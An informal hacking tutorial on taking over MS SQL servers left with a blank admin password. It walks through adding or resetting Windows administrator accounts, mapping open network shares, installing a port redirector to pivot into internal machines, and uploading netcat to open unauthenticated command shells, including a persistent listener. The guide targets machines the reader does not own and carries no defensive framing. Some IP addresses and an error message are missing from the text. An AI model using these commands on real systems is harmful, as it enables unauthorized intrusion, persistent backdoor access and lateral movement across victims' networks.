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SQL Situations And Solutions

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SQL- Possible situation and solutions to it.
Written By: kd-team
Some info is from other tutorials thx to the peeps who wrote them.

Well this tut is intended for the harder machines that are not so easy to hack.

1.) a machine with a intern ip number
2.) a machine in a network with no rights to write to the local harddisk
3.) a alternative shell to the normal sqlexec.exe
4.) A bit of maybe usefull words


1.) a machine with a intern ip number |

*********Solution Number 1:************************

Thx to dD for the initial tutorial.

Let's say you hack a machine with the normal sa/blank pass and when you do ipconfig
it says or
The first thing to do is to check if it has firewall if that is not the case then look
if port 135 = open or port 3389.
Add yourself as a new user or change the password of the admin

change: net user Admin newpass
new: net user test password /add

When you've done this you can connect with remote desktop to 3389 and use the user/pass
or just do it the traditional NT way

*********Solution Number 2:************************

Always when you have a machine with a internal ip number it means that it is part of a network
that means 2 things that is has ports forwarded that's how you hacked it the port of SQL = forwarded
pretty dumb but ohwell and it also means that there is another machine who has a normal ip or a
If it is a normal machine then they have used software things and 2 network card to make a network if
this is the case you can still run a ftp server on it.

first you've got to do is find out what the main server could be

view computers on te network: net view

usually it has normal names to recognize like Server2000, PrimaryPc, Server, MainServer etc

Ones you've find that out you've got to see if they have shares

share command: net view \\MainServer

if they've got like C shared or something like that you can just connect to it with no password.

connect command: net use Z: \\MainServer\C

then change to the new mapped drive. Now comes the tricky part.

When you are on the share of the server you've got to install a bouncer or a redirector
that is a thing that redirects the connection a port to another port or IP.
For this example I'll use Bouncer already posted at the board:)

you run it (it's best to install it as a service bouncer itself has no service option but it can still be done)

command for bouncer: bouncer.exe --port 1234 --destination --daemon

little info on this line --port = the listening port on the server machine
--destination = the intern ip to where it sshould be bounced or redirected the incomming traffic.

when this is done just run you're favo ftp server on the intern machine and all connection will get there.


2.) a machine in a network with no rights to write to the local harddisk |

When you have a machine that when you use ftp or tftp says that it can't write to local harddisk.
Then just used the method explained above to hack it on the NT way
because even though you can't write to the harddisk you usually still can add users etc


3.) a alternative shell to the normal sqlexec.exe |

Usually when you have got sqlexec connected and you are working with it usually you get errors like:


and then you just can't do anything with it well here a simple but effective way to get a other shell.

if tftp or ftp works just upload nc.exe(netcat can found everywhere on the net).

ones uploaded there are 2 commands you can use:

command1: nc.exe -l -p 1234 -d -e cmd.exe
command2: nc.exe -p 1234 -L -d -e cmd.exe

first of all it is NOT WISE to install nc as a service since it doesn't have password protection that
means that anyone can take over the machine

nou explanation of the commands:

command1: this is a use and dump command it means that you can connect only ones to it after you disconnet
it is gone then you've got to do it all over again with sql.
But as said before this shell is intended to make the hack easier and not as backdoor.

command2: with this command nc keeps listening so after you disconnect you can reconnect again.
this is only handy if you are hacking a network and need to disconnect to do other things or something
like that but not recomended because if someone finds it bye bye stro you can stop this by killing nc
after you are done.


4.) A bit of maybe usefull words |

When you are hacking or you wanna learn to hack plz make a diference for yourself I mean

make up you're mind if you wannabee super fxp/defacing dude (100boxes in 1 hour) OR
you wanna learn to hack interesting shit

for the first peeps this tut is useless because it is time consuming so just use the normal and fast shit
skip networks and such things

for the second peeps tut it can be usefull because it mixes a few ways together so at the end you have
control of the machine.

Last thing to say

Hack away but keep it nice



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